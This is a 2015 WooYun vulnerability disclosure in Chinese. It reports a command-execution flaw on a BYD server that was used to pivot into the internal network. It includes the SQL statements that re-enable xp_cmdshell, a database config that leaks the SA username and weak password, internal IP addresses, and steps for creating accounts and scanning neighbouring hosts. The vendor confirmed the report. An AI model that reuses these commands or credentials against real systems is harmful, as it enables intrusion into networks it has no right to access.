漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-097814
漏洞标题:比亚迪某系统命令执行导致的内网漫游
相关厂商:bydauto.com.cn
漏洞作者: 氓氓童鞋
提交时间:2015-02-20 19:45
修复时间:2015-04-06 19:46
公开时间:2015-04-06 19:46
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-20: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-06: 细节向公众公开
简要描述:
之前提过比亚迪外网可能还有很多服务器存在命令执行 找了一下 果然有 而且还可以作为边界服务器漫游内网
详细说明:
漏洞证明:
创建了个test用户,连接远程桌面进去看了下,有内网IP:
在此台计算上:
发现数据库配置信息:
<bean id="dataSource" class="org.apache.commons.dbcp.BasicDataSource" destroy-method="close">
<!-- SQL Server 2005 for microsoft -->
<!--
<property name="driverClassName" value="com.microsoft.sqlserver.jdbc.SQLServerDriver"/>
<property name="url" value="jdbc:sqlserver://10.12.3.143(137):1433;databaseName=cms"/>
-->
<!-- SQL Server 2005 for jtds -->
<property name="driverClassName" value="net.sourceforge.jtds.jdbc.Driver"/>
<!--正式 -->
<property name="url" value="jdbc:jtds:sqlserver://10.12.3.137:1433/cms"/>
<!--测试 -->
<!-- <property name="url" value="jdbc:jtds:sqlserver://10.12.3.143:1433/cms"/>-->
<property name="username" value="sa"/>
<property name="password" value="bydbyd"/>
sa权限,提权,遇到阻碍,禁止了cmshell 安全选项
直接sa链接进去 执行SQL 恢复了(所以这种加固是不彻底的,不能随意的将sa权限授予普通web用户):
EXEC sp_configure 'show advanced options', 1 --
RECONFIGURE WITH OVERRIDE --
EXEC sp_configure 'xp_cmdshell', 1 --
RECONFIGURE WITH OVERRIDE --
EXEC sp_configure 'show advanced options', 0 --
接着提权,创建test用户 连接:
这次应该是到了核心的内网了,看了下附近的服务器情况:
用同样的弱口令对10.12.3.*网段进行扫描:
又有两台内网主机可以提权:
10.12.3.126 --- sa/bydbyd
10.12.3.143 ---sa/bydbyd
没再深入了 ~
修复方案:
边界问题的网络配置很重要 运维中的权限也需要加强~
请给20rank 谢谢~
版权声明:转载请注明来源 氓氓童鞋@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-03-02 13:36
厂商回复:
感谢提供,目前已屏蔽该网站的访问。
最新状态:
暂无